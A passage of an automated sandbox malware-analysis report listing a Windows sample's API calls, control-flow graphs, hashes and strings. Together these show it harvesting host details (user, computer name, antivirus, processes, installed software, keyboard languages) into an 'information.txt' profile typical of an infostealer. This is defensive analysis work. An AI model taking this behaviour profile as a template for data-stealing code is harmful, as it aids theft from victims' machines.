                                                                                                                                                                          • Part of subcall function 00190C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
                                                                                                                                                                          • Part of subcall function 00190C5A: GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
                                                                                                                                                                          • Part of subcall function 00190C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
                                                                                                                                                                          • Part of subcall function 00190C28: HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
                                                                                                                                                                          • Part of subcall function 00190C28: GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
                                                                                                                                                                          • Part of subcall function 00191538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
                                                                                                                                                                          • Part of subcall function 00191538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
                                                                                                                                                                          • Part of subcall function 00191538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00191560
                                                                                                                                                                          • Part of subcall function 00191538: ReleaseDC.USER32(00000000,00000000), ref: 0019156B
                                                                                                                                                                          • Part of subcall function 00191538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC), ref: 00191577
                                                                                                                                                                          • Part of subcall function 00191538: HeapAlloc.KERNEL32(00000000,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 0019157E
                                                                                                                                                                          • Part of subcall function 00191538: wsprintfA.USER32 ref: 00191590
                                                                                                                                                                          • Part of subcall function 00190DB0: GetKeyboardLayoutList.USER32(00000000,00000000,001B670A,?,?), ref: 00190DE1
                                                                                                                                                                          • Part of subcall function 00190DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00190DEF
                                                                                                                                                                          • Part of subcall function 00190DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00190DFD
                                                                                                                                                                          • Part of subcall function 00190DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00190E2C
                                                                                                                                                                          • Part of subcall function 00190DB0: LocalFree.KERNEL32(00000000), ref: 00190ED4
                                                                                                                                                                          • Part of subcall function 00190D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00190D1E
                                                                                                                                                                          • Part of subcall function 00190D03: HeapAlloc.KERNEL32(00000000), ref: 00190D25
                                                                                                                                                                          • Part of subcall function 00190D03: GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
                                                                                                                                                                          • Part of subcall function 00190D03: wsprintfA.USER32 ref: 00190D52
                                                                                                                                                                          • Part of subcall function 00190F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934), ref: 00190F3A
                                                                                                                                                                          • Part of subcall function 00190F26: HeapAlloc.KERNEL32(00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F41
                                                                                                                                                                          • Part of subcall function 00190F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ), ref: 00190F5F
                                                                                                                                                                          • Part of subcall function 00190F26: RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000), ref: 00190F7B
                                                                                                                                                                          • Part of subcall function 00190F26: RegCloseKey.ADVAPI32(001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F84
                                                                                                                                                                          • Part of subcall function 00190FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00191052
                                                                                                                                                                          • Part of subcall function 00190FDC: wsprintfA.USER32 ref: 001910B0
                                                                                                                                                                          • Part of subcall function 00190F8F: GetSystemInfo.KERNEL32(?), ref: 00190FA9
                                                                                                                                                                          • Part of subcall function 00190F8F: wsprintfA.USER32 ref: 00190FC1
                                                                                                                                                                          • Part of subcall function 001910EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 00191106
                                                                                                                                                                          • Part of subcall function 001910EE: HeapAlloc.KERNEL32(00000000), ref: 0019110D
                                                                                                                                                                          • Part of subcall function 001910EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00191129
                                                                                                                                                                          • Part of subcall function 001910EE: wsprintfA.USER32 ref: 0019114F
                                                                                                                                                                          • Part of subcall function 0019147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B670F,?,?), ref: 001914A9
                                                                                                                                                                          • Part of subcall function 0019147A: Process32First.KERNEL32(00000000,00000128), ref: 001914B9
                                                                                                                                                                          • Part of subcall function 0019147A: Process32Next.KERNEL32(00000000,00000128), ref: 00191517
                                                                                                                                                                          • Part of subcall function 0019147A: CloseHandle.KERNEL32(00000000), ref: 00191522
                                                                                                                                                                          • Part of subcall function 001911D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,001B670E,00000000,?,?), ref: 00191248
                                                                                                                                                                          • Part of subcall function 001911D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00191285
                                                                                                                                                                          • Part of subcall function 001911D8: wsprintfA.USER32 ref: 001912B2
                                                                                                                                                                          • Part of subcall function 001911D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 001912D1
                                                                                                                                                                          • Part of subcall function 001911D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00191307
                                                                                                                                                                          • Part of subcall function 001911D8: lstrlenA.KERNEL32(?), ref: 0019131C
                                                                                                                                                                          • Part of subcall function 001911D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,001B6E94), ref: 001913B1
                                                                                                                                                                          • Part of subcall function 001911D8: RegCloseKey.ADVAPI32(?), ref: 0019141B
                                                                                                                                                                          • Part of subcall function 001911D8: RegCloseKey.ADVAPI32(?), ref: 00191447
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000), ref: 001945A3
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                        • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                        • API String ID: 478979899-3666103263
                                                                                                                                                                        • Opcode ID: a3e5660c5595dfa6f40fe60945a41527f28bc704f853b33611c8f8e03287d6c3
                                                                                                                                                                        • Instruction ID: 549d63bae2069354e43de1cfc24fb5189c2c00b640d1f9c655097840382dbfe3
                                                                                                                                                                        • Opcode Fuzzy Hash: a3e5660c5595dfa6f40fe60945a41527f28bc704f853b33611c8f8e03287d6c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C52D231D00529ABDF02FBA4EC429DDB7B4AF29704F5281A1E56177162DB70BF4A8F90
                                                                                                                                                                        Function 00198685 Relevance: 48.2, APIs: 32, Instructions: 154libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1325 198685-198695 call 1985dc 1328 19869b-198881 call 187d47 GetProcAddress * 20 1325->1328 1329 198886-1988e3 LoadLibraryA * 5 1325->1329 1328->1329 1331 1988e5-1988f2 GetProcAddress 1329->1331 1332 1988f7-1988fe 1329->1332 1331->1332 1334 198929-198930 1332->1334 1335 198900-198924 GetProcAddress * 2 1332->1335 1336 198932-19893f GetProcAddress 1334->1336 1337 198944-19894b 1334->1337 1335->1334 1336->1337 1338 19894d-19895a GetProcAddress 1337->1338 1339 19895f-198966 1337->1339 1338->1339 1341 198968-19898c GetProcAddress * 2 1339->1341 1342 198991 1339->1342 1341->1342
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986C6
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986DD
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986F4
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019870B
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198722
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198739
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198750
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198767
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019877E
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198795
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987AC
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987C3
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987DA
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987F1
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198808
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019881F
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198836
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019884D
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198864
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019887B
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 0019888C
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 0019889D
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988AE
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988BF
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988D0
                                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,00198504), ref: 001988EC
                                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,00198504), ref: 00198907
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019891E
                                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,00198504), ref: 00198939
                                                                                                                                                                        • GetProcAddress.KERNEL32(75450000,00198504), ref: 00198954
                                                                                                                                                                        • GetProcAddress.KERNEL32(76E90000,00198504), ref: 0019896F
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198986
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2238633743-0
                                                                                                                                                                        • Opcode ID: 3795c2dcf0ab894f8e611efe9857dcb6342e9bd51ad1102324ab242e3ec64430
                                                                                                                                                                        • Instruction ID: ac33998399804449391722fd46492297858e0ff65677007b7b7aa634e65e21a8
                                                                                                                                                                        • Opcode Fuzzy Hash: 3795c2dcf0ab894f8e611efe9857dcb6342e9bd51ad1102324ab242e3ec64430
                                                                                                                                                                        • Instruction Fuzzy Hash: 8171CA79903222AFDB037FA6FC499247FBEF749301B119927E9018A270D7728860EF54
                                                                                                                                                                        Function 001969F8 Relevance: 37.0, APIs: 8, Strings: 13, Instructions: 249sleepCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 0019051E: lstrlenA.KERNEL32(?,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190524
                                                                                                                                                                          • Part of subcall function 0019051E: lstrcpyA.KERNEL32(00000000,00000000,?,001971B6,001B66BE,001B66BB,?,?,?,?,001985D1), ref: 00190556
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 00196908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0019695C
                                                                                                                                                                          • Part of subcall function 00196908: lstrlenA.KERNEL32(?), ref: 00196967
                                                                                                                                                                          • Part of subcall function 00196908: StrStrA.SHLWAPI(00000000,?), ref: 0019697C
                                                                                                                                                                          • Part of subcall function 00196908: lstrlenA.KERNEL32(?), ref: 0019698B
                                                                                                                                                                          • Part of subcall function 00196908: lstrlenA.KERNEL32(00000000), ref: 001969A4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196AE2
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196B3B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196B9B
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196BF4
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C0A
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C20
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 00196C32
                                                                                                                                                                        • Sleep.KERNEL32(0000EA60), ref: 00196C41
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$lstrcpy$Sleep
                                                                                                                                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                        • API String ID: 2840494320-608462545
                                                                                                                                                                        • Opcode ID: 42e2cfb7ababe4000103049995a9f492b572998e4482c8d522c5dfb260c686a1
                                                                                                                                                                        • Instruction ID: ce6d568c29da03337c9472915d3dfabfdf1957c549b33584644e55693bde5208
                                                                                                                                                                        • Opcode Fuzzy Hash: 42e2cfb7ababe4000103049995a9f492b572998e4482c8d522c5dfb260c686a1
                                                                                                                                                                        • Instruction Fuzzy Hash: 5691D432E40628ABDF52FBA4ED429CC77B4AF24704F518061F915B7166DB34AF0A8B91
                                                                                                                                                                        Function 00181666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1487 181666-18169e GetTempPathW 1488 181809-18180b 1487->1488 1489 1816a4-1816cb wsprintfW 1487->1489 1491 1817fa-181808 call 19d05a 1488->1491 1490 1816d0-1816f5 CreateFileW 1489->1490 1490->1488 1493 1816fb-18174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 1a3c60 WriteFile 1490->1493 1493->1488 1497 181754-18175a 1493->1497 1497->1488 1498 181760-18179c call 1a3c60 CloseHandle CreateFileW 1497->1498 1498->1488 1501 18179e-1817b1 ReadFile 1498->1501 1501->1488 1502 1817b3-1817b9 1501->1502 1502->1488 1503 1817bb-1817f1 call 1a3c60 GetProcessHeap RtlFreeHeap CloseHandle 1502->1503 1503->1490 1506 1817f7-1817f9 1503->1506 1506->1491
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00181696
                                                                                                                                                                        • wsprintfW.USER32 ref: 001816BC
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 001816E6
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 001816FE
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00181705
                                                                                                                                                                        • _time64.MSVCRT ref: 0018170E
                                                                                                                                                                        • srand.MSVCRT ref: 00181715
                                                                                                                                                                        • rand.MSVCRT ref: 0018171E
                                                                                                                                                                        • _memset.LIBCMT ref: 0018172E
                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00181746
                                                                                                                                                                        • _memset.LIBCMT ref: 00181763
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00181771
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0018178D
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 001817A9
                                                                                                                                                                        • _memset.LIBCMT ref: 001817BE
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001817C8
                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 001817CF
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 001817DB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
